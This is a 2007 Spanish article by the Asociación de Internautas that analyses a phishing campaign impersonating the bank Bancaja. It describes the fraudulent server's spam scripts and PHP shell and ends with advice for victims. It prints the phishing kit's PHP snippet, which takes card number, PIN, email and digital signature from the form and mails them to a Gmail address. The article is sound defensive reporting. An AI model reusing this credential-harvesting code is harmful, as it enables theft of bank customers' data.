phishing

ir a menu
ir a noticias
ir a bloques informativos
Ir a Página sobre accesibilidad
Ir a Página de Inicio
Ir a Página de Texto
Ir a Mapa web
Ir a Buscador
Ir a Aviso Legal
Contactar con la Asociación de Internautas
Comprueba tu velocidad de conexion, ADSL, Cable, RTB

Menu

Noticias

Ayuda a la Asociación de Internautas con tu donación

Descubrimos al delicuente

Análisis de un fraude online a Bancaja donde se descubre al ciber-delincuente.

La Comisión de seguridad de la Asociación de Internautas descubre donde van los datos obtenidos de un fraude online que afecta una vez mas a una entidad bancaria española, tras el aviso de varios internautas de un nuevo caso de phishing bancario, se realizo un estudio del servidor afectado y se descubrió varias herramientas usadas por los autores del fraude para controlar y realizar nuevos ataques.

06-09-2007 - Una vez mas tenemos que hablar de los continuos intentos de fraudes que invaden la red, el ultimo detectado afecta a clientes de la entidad Bancaja, enmascarado tras una notificación electrónica con el asunto “nuevo Sistema de Securidad”;



Este correo electrónico solo tiene un propósito que un cliente victima del engaño pulse sobre el enlace trampa y le muestre en su navegador una web que suplanta la imagen de la entidad afectada de esta manera teclee sus claves personales:





Tras realizar una análisis del servidor fraudulento descubrimos que en el mismo existen todo tipo de herramientas para realizar el envió de correo spam, control del servidor afectado para realizar nuevos ataques o activar las web trampas. En las siguientes imágenes se puede comprobar los diferentes script-php para el control del servidor:



Script para enviar los correos electrónicos:



PhP-Shell para el control del servidor afectado:



Analizando mas profundamente el servidor podemos descubrir donde van los datos robados;



$email = $_POST['email'];
$firma = $_POST['firma'];
$ccnumar = $_POST['pan'];
$pin = $_POST['pin'];
$msg = 'CCnumar: '.$ccnumar.' '.'Pin: '.$pin.' '.'Correo Electr: '.$email.' '.'Firma Digital: .$firma.';
mail('leo.sww@gmail.com','Login',$msg);

Aunque muchos usuarios piensen que en este tipo de trampa es muy conocida, todavía hay miles de internautas y clientes de la banca online que “pican” en este tipo de trampa, cada día son mejores las falsificaciones y los nombres del dominio son muy parecidos al verdadero usado por la entidad bancaria.

Desde la Asociación de Internautas recomendamos que - NO RESPONDAN A ESTE TIPO DE CORREOS , NI PULSEN LOS ENLACES QUE CONTIENEN . Su banco NUNCA le solicitará sus datos privados o sus claves para acceder a su cuenta online.

Los Bancos son depositarios de sus claves y nunca las piden, ni por teléfono, ni por fax ni por correo, ni físicamente es Usted el que debe de solicitarlas en caso de olvidarlas o extraviarlas.


Consejos si usted fue victima de este tipo de engaño,

1.- Actué rápido.

2.- Cambien las claves privadas por unas nuevas.

3.- Notifique lo antes posible la incidencia a su entidad, no espere a mañana llame de inmediato, las entidades bancarias actuaran al instante sobre este tipo de estafas.

4.- Denuncie el fraude a las Fuerzas de Seguridad del Estado.


Como funciona un troyano bancario en el ordenador de una victima:

Troyano bancario y que afecta a clientes de banca en línea española.

http://seguridad.internautas.org/html/4189.html

Análisis del troyano: http://seguridad.internautas.org/html/4185.html

Troyano que roba certificados bancarios: http://seguridad.internautas.org/html/4258.html

Como funciona un troyano bancario en el ordenador de una victima, Internautas Televisión:
http://www.internautas.tv/?tv=100

- Aviso de seguridad de Bancaja -

No confirme sus datos por Internet,
Le recordamos que nunca debe facilitar ni confirmar sus claves de acceso ni de firma digital de Bancaja Próxima por teléfono o correo electrónico. Si recibe algún correo o llamada en este sentido, contacte con el Teléfono de Atención al Usuario de Bancaja (902 23 00 24). Para acceder a Bancaja Próxima debe hacerlo siempre tecleando en su navegador la dirección www.bancaja.es y nunca acceder desde enlaces que se encuentren en correos electrónicos.
Mas información



CASOS Y RECOMENDACIONES SOBRE EL PHISHING

Guía rápida para reconocer páginas web falsas que simulan entidades bancarias.

Guía rápida para conocer los nuevos fraudes que se producen en la red.

Normas de Seguridad para acceder a la banca por internet

Se abre el debate: ¿Podemos prevenir posibles ataques de fraude de phishing bancario?.

Internautas Televisión: Informe phishing 2006 en España.

Internautas Televisión: ROBOS DE CLAVES.

Internautas Televisión: Phishing.

Internautas Televisión: ¿Cuánto cuesta un ataque phishing?

Internautas Televisión: Guía de fraudes en la red.


-Medios de comunicación se hacen eco y alertan a los usuarios del grave peligro del phishing y del scam en nuestro pais.-

Tele Madrid

TVE 1

LE PUEDE PASAR A CUALQUIERA.


SeguridaPymes.es ofrece el indicador Alert-Phishing para sitios web.

INFORME SOBRE LA BANCA ONLINE ¿ES SEGURA? ¿La banca online es vulnerable?

Faq de ayuda sobre phishing;
http://seguridad.internautas.org/html/1/451.html
http://www.seguridadpymes.es/noticia.php?id=5

La Asociación de Internautas cuenta con un servicio operativo desde diciembre de 2004, a disposición de todos aquellos internautas que quieran reportar información sobre este tipo de fraudes Phishing, pueden mandar un correo y adjuntar la información a; phishing@internautas.org

Se estudia el caso y se comunica a las Fuerzas de Seguridad del Estado para cursar la denuncia.


- CONFIANZA EN LÍNEA-

Normas de Seguridad para acceder a la banca por internet

Normas de Seguridad para una clave perfecta en Internet

Programa que te ayuda a Generar Claves Seguras.

Agradecemos a todos los amigos internautas que participan en la campaña Anti-Phising y denunciaron este tipo de fraudes.

SeguridaPymes.es ofrece el indicador Alert-Phishing para sitios web.

----------SEGUIMIENTO DEL PHISHING EN ESPAÑA DESDE 2004---------------

INFORME 2006: El Phishing en España se incrementa un 290% en 2006.

INFORME 2005: BBVA la entidad más atacada por Phising en 2005.

SEGUIMIENTO EN LÍNEA

ALERTA - PHISING

RECOMENDACIONES

Normas de Seguridad para acceder a la banca por internet

Normas de Seguridad para una clave perfecta en Internet

Programa que te ayuda a Generar Claves Seguras.

DENUNCIA
PHISHING


Volver<<< Volver
ImprimirVersión para imprimir Impresora | Versión PDF PDF
Enviar artículo a un amigo:
Las direcciones de correo no se almacenan en parte alguna, simplemente son utilizadas para el envio del correo al destinatario

Bloques informativos

phishing

Seguridad Pymes

Logos y Marcas propiedad de sus respectivos autores
Se permite la reproducción total o parcial de todos los contenidos siempre que se cite la fuente y se enlace con el original
Logo AI pequeño
© 1998-2015 Asociación de Internautas
Aviso Legal - Contacto
¡Nuestro RSS! | Accesibilidad

¡Internautas Televisión! |¡Alertvir! |¡Seguridad en las PYMES! |¡Comisión de Seguridad! |¡Tienda de la Asociación de Internautas! |¡Seguridad en la Red! |¡Foros públicos de la Asociación de Internautas!